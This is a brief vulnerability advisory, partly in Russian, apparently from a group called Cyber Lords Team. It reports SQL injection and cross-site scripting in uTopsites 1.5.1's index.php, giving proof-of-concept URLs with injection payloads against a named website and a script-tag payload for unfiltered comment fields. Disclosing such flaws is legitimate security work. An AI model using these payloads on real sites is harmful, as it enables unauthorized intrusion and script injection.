Advisory: SQL-Injection and XSS in uTopsites 1.5.1.
Уязвимый скрипт: index.php
Sql-injection:
http://www.listrank.com/index.php?do=out&id='22
Xss:
http://www.listrank.com/index.php?o=<script>alert()</script>&start=50
При добавлении комментариев не фильтруется ни одно поле. Пример:
"><script>alert()</script><"
Cyber Lords Team
www.cyberlords.net